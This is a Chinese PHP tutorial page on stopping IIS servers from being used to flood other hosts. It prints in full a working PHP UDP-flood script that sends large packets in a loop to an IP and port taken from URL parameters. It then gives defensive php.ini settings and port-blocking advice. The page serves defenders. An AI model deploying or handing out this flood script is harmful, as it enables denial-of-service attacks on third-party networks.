当前位置:首页 > PHP教程 > php高级应用 > 列表

iis防止php ddos占完网络带宽与服务器资源解决方法

发布:smiling 来源: PHP粉丝网  添加日期:2014-09-02 16:16:19 浏览: 评论:0 

用PHP代码调用sockets,直接用服务器的网络攻击别的IP,以前我在apache下有碰到这样的问题,今天我们讲讲述一下关于在iis防止php ddos占完网络带宽与服务器资源的处理办法.

php ddos的常见代码如下:

  1. <?php 
  2. $packets = 0;  
  3. $ip = $_GET['ip'];  
  4. $rand = $_GET['port'];  
  5. set_time_limit(0);  
  6. ignore_user_abort(FALSE); 
  7.  
  8. $exec_time = $_GET['time']; 
  9.  
  10. $time = time();  
  11. print "Flooded: $ip on port $rand 
  12.  
  13. ";  
  14. $max_time = $time+$exec_time
  15.  
  16.  
  17. for($i=0;$i<65535;$i++){  
  18. $out .= "X";  
  19. }  
  20. while(1){  
  21. $packets++;  
  22. if(time() > $max_time){  
  23. break;  
  24.  
  25. $fp = fsockopen("udp://$ip"$rand$errno$errstr, 5);  
  26. if($fp){  
  27. fwrite($fp$out);  
  28. fclose($fp);  
  29. }  
  30. }  
  31. echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging "round($packets/$exec_time, 2) . " packets/s \n";  
  32. ?> 

表现特征:一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到DDOS攻击是不同的,DDOS是不断收到大量数据包.

解决办法:在c:windowsphp.ini里设其值为Off,代码如下:

allow_url_fopen = Off

并且,代码如下:

;extension=php_sockets.dll

前面的;号一定要有,意思就是限制用sockets.dll

然后:代码如下:

; ignore_user_abort = On

前面的;号要去掉,然后重启IIS,如果上述方式仍然无效,你可以在IIS中,允许的扩展中,禁止PHP的扩展测试.

注:如果你的服务器不要运行机制php可以关闭,如果需要的话可以把php_sockets.dll 给禁止,还有一种办法就是把udp端口全部封了,只要80等一些重要的端口开放就可以了.

Tags: iis防止ddos ddos网络带宽

分享到: